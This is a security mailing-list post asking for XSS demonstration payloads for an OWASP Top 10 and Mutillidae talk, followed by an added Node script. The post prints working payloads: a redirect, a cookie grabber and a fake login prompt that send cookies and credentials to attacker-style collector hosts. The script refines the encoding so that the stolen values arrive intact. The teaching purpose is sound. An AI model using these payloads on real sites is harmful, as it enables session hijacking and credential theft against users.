Ok, I've got yet another presentation coming up, this time on the OWASP Top
10 and Mutillidae. One of the things I'm going to cover is XSS. The
canonical example of course is:
<script>alert("XSS");</script>
but that is boring, and gives folks the impression that XSS is not that
serious. Better short examples would be:
*Redirect traffic to your site:*
<script>window.location = "http://www.irongeek.com/"</script>
*A little cookie Grabbing:*
<script>
// send the victim's cookies to the collector as a query parameter
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
</script>
*Or maybe a password form to make people think they have to login, but it
just grabs the credentials:*
<script>
// fake login: prompt for credentials, then leak them via an image request
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");
</script>
What are other cool things to inject, besides maybe BeEF, that show off how
XSS can be a big deal?
Thanks,
Adrian
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
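An added example, not code from Adrian's post: it builds the same collector URLs that the cookie-grabbing and fake-login payloads above would request and shows what the collector on the other end actually receives. It runs under Node, no browser needed. The collector URL http://attacker.hak/catch.php is taken from the post; the cookie and credential values are constructed for the demo, and the function names (exfilUrl, collectorSees, grabCookieAsPosted, grabCookieFixed, phishUrlFixed) are mine, not anything from Mutillidae or the post.

```javascript
// Added example, not code from Adrian's post: shows what the collector behind
// the cookie-grabbing and fake-login payloads actually receives, and why
// encodeURI (as used in the posted payload) can silently lose part of the loot.
// Runs in Node; no browser needed. The collector URL is taken from the post,
// everything else (cookie values, credentials, function names) is constructed.

const COLLECTOR = "http://attacker.hak/catch.php"; // from the post; not a real host

// Build the URL an injected payload would request, one query parameter per
// key, each value run through the supplied encoder.
function exfilUrl(params, encode) {
  const query = Object.entries(params)
    .map(([key, value]) => `${key}=${encode(value)}`)
    .join("&");
  return `${COLLECTOR}?${query}`;
}

// What catch.php sees for a given parameter after the browser sends the
// request: standard query-string parsing, with any '#...' fragment dropped
// before the request is even made.
function collectorSees(url, name) {
  return new URL(url).searchParams.get(name);
}

// The cookie grabber exactly as posted: encodeURI leaves '&', '=', ';' and '#'
// untouched, so a cookie value containing '&' or '#' is cut short.
function grabCookieAsPosted(cookie) {
  return exfilUrl({ cookie }, encodeURI);
}

// Same payload with encodeURIComponent: every reserved character is escaped,
// so the collector gets the whole document.cookie string back intact.
function grabCookieFixed(cookie) {
  return exfilUrl({ cookie }, encodeURIComponent);
}

// The fake-login payload with the credentials encoded (the posted version
// concatenates them raw, so a password containing '&' or '#' is truncated).
function phishUrlFixed(username, password) {
  return exfilUrl({ username, password }, encodeURIComponent);
}

// Constructed stand-in for what document.cookie would return on the victim
// page: two cookies, the second carrying '&' and '=' inside its value.
const SAMPLE_COOKIE = "PHPSESSID=0ac1c1e5d; prefs=theme=dark&lang=en";

function demo() {
  const asPosted = grabCookieAsPosted(SAMPLE_COOKIE);
  const fixed = grabCookieFixed(SAMPLE_COOKIE);
  console.log("payload as posted requests:", asPosted);
  console.log("  collector sees cookie =", JSON.stringify(collectorSees(asPosted, "cookie")));
  console.log("fixed payload requests:   ", fixed);
  console.log("  collector sees cookie =", JSON.stringify(collectorSees(fixed, "cookie")));
  const phish = phishUrlFixed("adrian", "p&ss#w=rd");
  console.log("fake login requests:", phish);
  console.log("  collector sees password =", JSON.stringify(collectorSees(phish, "password")));
}

demo();
```

On a real victim page the cookie string comes from document.cookie, so any cookie flagged HttpOnly never shows up in it; that is worth saying on the slide, because it is why the fake-login and "act as the user" demos still matter when the session cookie cannot be grabbed.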